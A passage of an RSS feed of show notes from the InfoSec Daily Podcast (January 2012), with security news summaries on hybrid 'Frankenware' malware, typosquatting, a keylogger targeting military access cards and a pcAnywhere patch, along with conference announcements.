<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What if two</span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm#"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#006400;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">computer</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> viruses got together on your computer and had a baby? </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It does happen, says security firm BitDefender, and the result is more mutant than mutt. The firm has taken to calling the third, new piece of malware produced by the odd couple &mdash; with apologies to Mary Shelley &mdash; &quot;Frankenware.&quot; The spontaneous</span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm#"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#006400;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">software</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> offspring might be dangerously unpredictable, and it can be harder to defend again, BitDefender says.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are so many computer viruses flying around out there that they can&#39;t help bumping into one other while wreaking havoc on our</span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm#"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#006400;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">computers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. In fact, virus writers account for this. In order to protect and defend a hard-won compromised computer, some virus writers actually install their own antivirus programs after they infect a PC. That way, another bad guy can&#39;t come along and hijack an already hijacked machine, said Catalin Cosoi, head of the Online Threats Lab at BitDefender, based in Romania.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.net-security.org/secworld.php?id=12275"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.net-security.org/secworld.php?id=12275</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A network of some 7,000 typo squatting domains is being used by scammers to effectively drive traffic towards their scammy sites, some of which get so much traffic that they managed to enter Alexa&#39;s top 250 list of sites with the largest Web traffic, say Websense researchers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The typo squatting domains take advantage of the &quot;fat-fingered&quot; visitors of popular websites such as Google, Twitter, Gmail, YouTube, Wikipedia, Victoria&#39;s Secret, Craigslist, and many more, and redirect them to spam survey sites. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.military.com/news/article/china-suspected-in-attacks-on-dod-computer-cards.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.military.com/news/article/china-suspected-in-attacks-on-dod-computer-cards.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber security firms have discovered a computer virus that uses servicemembers&rsquo; network security cards to hack into government networks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How does it work? servicemembers receive an email with an official-looking PDF file connected to the virus that allows it to record keystrokes, said Jaime Blasco, lab manager for Alien Vault, a California-based cyber security firm. The virus then collects a service member&rsquo;s personal identification number associated with a Common Access Card when he logs into a government computer.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The hackers can get in pretty easily with this virus and do whatever they want on a government computer while a soldier just works on his computer,&rdquo; Blasco said in a phone interview from his office in Spain.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Blasco said he suspects the cyber attack originates from China because of the Chinese characters found within the virus&rsquo; coding.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-579-dude-wheres-my-porn-please-pass-the-tinfoil-virus-inception-birth-of-skynet-spamvertisement-squatnet-all-your-dod-are-belong-to-us/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3419/0/infosec-daily-podcast-episode-579.mp3" length="21400073" type="audio/mpeg" />
		<itunes:duration>0:44:32</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 579 for January 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 579 for January 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://torrentfreak.com/megaupload-users-plan-to-sue-the-fbi-over-lost-files-120126/
In most reports following the MegaUpload shutdown, the site is exclusively portrayed as a piracy haven.
&#160;
However, hundreds of thousands, perhaps millions of people used the site to share research data, work documents, personal video collections.
&#160;
As of today, these people are still unsure whether they will ever get their personal belongings back.
&#160;
In a response, Pirate Parties worldwide have started to make a list of all the people affected by the raids, and they are planning to file an official complaint against the US authorities.
&#8220;The widespread damage caused by the sudden closure of Meg[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 578 &#8211; malwareAnywhere™, Zulu, NYPII, DoDroid &amp; Threat of the Year</title>
		<link>http://www.isdpodcast.com/episode-578-malwareanywhere-zulu-nypii-dodroid-threat-of-the-year</link>
		<comments>http://www.isdpodcast.com/episode-578-malwareanywhere-zulu-nypii-dodroid-threat-of-the-year#comments</comments>
		<pubDate>Fri, 27 Jan 2012 03:15:34 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3417</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 578 for January 26, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.9625445182842152" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 578 for January 26, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/01/25/pcanywhere_patch/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/01/25/pcanywhere_patch/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec is urging users to patch pcAnywhere, its remote control application, following the discovery of a brace of serious security flaws.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The most severe of the two holes allows hackers to remotely inject code into vulnerable systems &#8211; made possible because a service on TCP port 5631 permits a fixed-length buffer overflow during the authentication process. This line of attack ought to be blocked by a properly configured firewall, but it&#39;d be stupid to rely on that without patching vulnerable systems.</span></p>
<p>&nbsp;</p>
